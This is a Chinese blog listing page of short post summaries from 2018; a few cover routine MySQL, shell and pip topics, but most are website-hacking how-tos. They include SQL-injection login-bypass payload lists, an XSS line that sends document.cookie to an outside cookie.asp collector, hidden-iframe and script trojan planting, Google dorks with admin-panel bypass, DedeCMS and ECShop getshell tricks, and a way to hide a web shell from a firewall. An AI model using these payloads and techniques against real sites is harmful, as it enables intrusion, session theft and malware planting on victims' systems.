摘要: 前几天发现服务器上的mysql出现锁表了,show processlist后发现好多都是因为写进session才锁表的,看到这个想起了会不会是硬盘空间不够了,马上查看了服务器硬盘空间,发现都100%了,马上清理硬盘空间,清理完后,还要杀掉mysql里锁表的进程,网上搜了个shell脚本来kill锁表 阅读全文
posted @ 2018-07-18 11:39 圆柱模板 阅读(895) 评论(0) 推荐(0) 编辑
摘要: ctrl+a //移到行首 ctrl+e //移到行尾 linux系统用 alt+a //移到光标所在单词首部alt+e //移到光标所在单词尾部 alt+d //删除光标处到单词尾部 ctrl+y // 插入最近删除的单词或语句ctrl+k //删除光标处到行尾部分ctrl+u //删除光标处到行 阅读全文
posted @ 2018-07-18 11:33 圆柱模板 阅读(159) 评论(0) 推荐(0) 编辑
摘要: 可以使用brew直接安装python,但是安装完成了之后没有pip命令。 pip是常用的python包管理工具,类似于java的maven。第一反应brew install pip,却提示没这货。 可见,pip的安装是跟python一起的。 换种方式: 会提示你输入密码,接着一路稍等。。。 阅读全文
posted @ 2018-07-18 11:30 圆柱模板 阅读(2606) 评论(0) 推荐(0) 编辑
摘要: 首先打开命令框,输入: 安装完成后 启动、停止、重启如下 配置文件位于 配置安全密码登录 创建超级用户 或(下面这个权限更高...) 配置文件开启强制验证,增加如下内容 验证登录 阅读全文
posted @ 2018-07-18 11:29 圆柱模板 阅读(585) 评论(0) 推荐(0) 编辑
摘要: SQL注入最常见的攻击方式,所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令,比如先前的很多影视网站泄露VIP会员密码大多就是通过WEB表单递交查询字符暴出的,这类表单特别容易受到SQL注入式攻击. 跨站脚本攻击(XSS 阅读全文
posted @ 2018-07-18 11:25 圆柱模板 阅读(298) 评论(0) 推荐(0) 编辑
摘要: halt = (DT_DEBUG || IN_ADMIN) ? 1 : 0; $db->pre = $CFG['tb_pre']; $db->connect($CFG['db_host'], $CFG['db_user'], $CFG['db_pass'], $CFG['db_name'], $CFG['db_expires'], $CFG['db_charset'], $CFG['... 阅读全文
posted @ 2018-07-18 11:22 圆柱模板 阅读(655) 评论(0) 推荐(0) 编辑
只有注册用户登录后才能阅读该文。 阅读全文
posted @ 2018-07-18 11:07 圆柱模板 阅读(20) 评论(0) 推荐(0) 编辑
摘要: 搜索型注入的暴库语句 当猜到tbl_admin这个表名的时候 阅读全文
posted @ 2018-07-18 11:04 圆柱模板 阅读(1034) 评论(0) 推荐(0) 编辑
只有注册用户登录后才能阅读该文。 阅读全文
posted @ 2018-07-18 11:02 圆柱模板 阅读(14) 评论(0) 推荐(0) 编辑
摘要: Web网页中挂马的方法 一:框架挂马 <iframe src=地址 width=0 height=0></iframe> 二:js文件挂马 首先将以下代码 保存为xxx.js, 则JS挂马代码为 <script language=javascript src=xxx.js></script> 三:j 阅读全文
posted @ 2018-07-18 10:54 圆柱模板 阅读(315) 评论(0) 推荐(0) 编辑
摘要: 在CMD 输入 nslookup 域名 例如:nslookup www.baidu.com有CDN的示例Server: cache3-gzAddress: 211.98.4.1Non-authoritative answer:Name: www.baidu.comAddresses: 119.75. 阅读全文
posted @ 2018-07-18 10:49 圆柱模板 阅读(224) 评论(0) 推荐(0) 编辑
摘要: 漏洞原因:DEDECMS由于编辑器过滤不严,将导致恶意脚本运行。可getshell取得权限。为什么说它是0Day呢?能getshell的都算0Day(鸡肋发挥起来也能变凤凰)目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。下面说说利用方法。条件有2个:开启注册开启投稿注册会员-发表 阅读全文
posted @ 2018-07-18 10:47 圆柱模板 阅读(448) 评论(0) 推荐(0) 编辑
摘要: 保存为cookie.asp 利用代码: <script>window.open('http://zhimo.yuanzhumuban.cc/cookie.asp?msg='+document.cookie)</script> 阅读全文
posted @ 2018-07-18 10:41 圆柱模板 阅读(1408) 评论(0) 推荐(0) 编辑
摘要: asp aspx万能密码 1:"or "a"="a 2: ')or('a'='a 3:or 1=1-- 4:'or 1=1-- 5:a'or' 1=1-- 6:"or 1=1-- 7:'or'a'='a 8:"or"="a'='a 9:'or''=' 10:'or'='or' 11:1 or '1' 阅读全文
posted @ 2018-07-18 10:39 圆柱模板 阅读(2399) 评论(0) 推荐(0) 编辑
摘要: 我们在Google中搜索关键词 关键字:inurl:szwyadmin/login.asp 任意打开一个搜索结果,打开登录界面后在地址栏中输入下面的代码: 代码: 关闭此页面 在次打开登录界面 在地址栏中将login.asp改为admin_index.asp 就直接进入后台了 另外还可以试试 ewe 阅读全文
posted @ 2018-07-18 10:36 圆柱模板 阅读(686) 评论(0) 推荐(0) 编辑
摘要: 1.判断是否有注入;and 1=1 ;and 1=2 2.初步判断是否是mssql ;and user>0 3.注入参数是字符’and [查询条件] and ”=’ 4.搜索时没过滤参数的’and [查询条件] and ‘%25’=’ 5.判断数据库系统;and (select count(*) f 阅读全文
posted @ 2018-07-18 10:35 圆柱模板 阅读(308) 评论(0) 推荐(0) 编辑
摘要: 很多拿站的朋友,都知道大马很多都会被安全狗拦截,最近一个大牛给我一个方法,竟然成功,所以分享下这个方法。 将大马写到一个txt文件里面,命名为dama.txt,再建一个文本文档,asp的就写入:<!–#include file=”dama.txt”–> ,保存为X.asp,两个文件传同目录下,访问u 阅读全文
posted @ 2018-07-18 10:33 圆柱模板 阅读(972) 评论(0) 推荐(0) 编辑
摘要: 昨晚上翻阅一本技术书籍中,找到灵感,发现的ECshop漏洞。 搜索关键字:关键字:powered by ecshop 方法一: 普通代码: 变种代码: 直接在网站后台加入代码回车就能爆出帐号密码,再去掉代码加上/admin回车就能直接进后台了。 拿shell方法很简单,找到“库项目管理”再选择“配送 阅读全文
posted @ 2018-07-18 10:15 圆柱模板 阅读(7115) 评论(2) 推荐(0) 编辑